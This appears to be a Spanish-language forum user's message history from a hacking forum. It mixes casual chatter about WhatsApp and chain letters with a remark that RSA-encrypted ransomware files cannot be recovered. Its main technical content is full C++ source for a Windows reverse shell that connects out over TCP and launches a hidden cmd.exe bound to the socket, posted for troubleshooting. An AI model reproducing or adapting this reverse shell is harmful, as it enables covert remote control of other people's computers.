Mensajes

Cuanto hay de ???   

Interesting...

Si se me hubiera ocurrido a mi programar Whatsapp.... 

Borren este hilo al pedo...

No creo que esto sea así siempre.

Haa,, si.. y por cierto.. tampoco creo que esos bebes estén drogados..

A mi me suena a otra cadena de facebook,, por suerte ya casi no se usan las cadenas de mail,, (si aquellos powerpoint llenos de imágenes sensacionalistas..) yo no creo que exista tal "mafia" del pobre,, hay pobres y listo. Hacen esas cosas para ganar la plata... (lamentablemente)

Saludos!

Me confirman desde el Laboratorio de virus que no se va a poder hacer nada para recuperar los ficheros cifrados.

El cifrado se realiza con RSA y la clave privada en todo momento sólo la tiene el autor, por lo que una vez los ficheros de la máquina son cifrados, es imposible su recuperación sin dicha clave privada.

http://soporte.pandasecurity.com/foro/viewtopic.php?f=13&t=1580&start=10

Queres intentar desencriptarlo? 

AWWGGRR!! El problema es el server si.. con netcat funciona.. creo que existe el código de nc,, tendría que ver por que mi cliente no mantiene la conexión estable..

Gracias!! Saludos!!

@cpu2 probe con eso que me decías del handle,, pero me parece que no es eso,, o al menos los valores se copian.. investigue que en windows también existe la función DuplicateHandle (con la cual también probé, pero no me funciona aun)

Así esta todo el código.. si alguien quiere revisarlo,, 

Código (cpp) [Seleccionar] Expandir


#include <WinSock2.h>
#pragma comment(lib,"ws2_32.lib")

#define PORT 8080
#define IP "127.0.0.1"
#define DEFAULT_BUFLEN 510
#include <iostream>
using namespace std;

// ESTRUCTURAS PARA SOCKET
WSADATA WSA; //--> ESTRUCTURA WSADATA;
SOCKET Socket; //--> VARIABLE DE TIPO SOCKET
SOCKADDR_IN SA_IN; //--> ESTRUCTURA SOCKADDR_IN
// ESTRUCTURAS PARA PROCESOS
STARTUPINFOA SI;
PROCESS_INFORMATION PI;
// ---------------------------------------------------

int main()
{
// SOCKET
WSAStartup(MAKEWORD(2, 2), &WSA);
Socket = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0);

SA_IN.sin_family   = AF_INET;
SA_IN.sin_port   = htons(PORT);
SA_IN.sin_addr.s_addr = inet_addr(IP);

connect(Socket, (struct sockaddr*)&SA_IN, sizeof(SA_IN));
//  ---------------------------------------------------------------

SI.cb   = sizeof(SI);
SI.wShowWindow   = SW_HIDE;
SI.dwFlags   = STARTF_USESHOWWINDOW + STARTF_USESTDHANDLES;
SI.lpDesktop       = SI.lpTitle = 0x0000;
SI.lpReserved2   = NULL;

SI.hStdInput   = SI.hStdOutput = SI.hStdError = (HANDLE)Socket;


LPSTR szCmdline   = "cmd.exe";
CreateProcessA(NULL, szCmdline, NULL, NULL, TRUE, 0, NULL, NULL, &SI, &PI);

return 0;
}


http://foro.elhacker.net/bugs_y_exploits/reverse_shell_unixlike-t380545.0.html

No entiendo un pomo a simple vista.. pero me va a servir! No sabia de _dup,, me ayudo a ver que no se copia el handle a la estructura STARTUPINFO

Bueno,, a ver como se resuelve esto.. luego actualizo 

Gracias cpu! Saludos!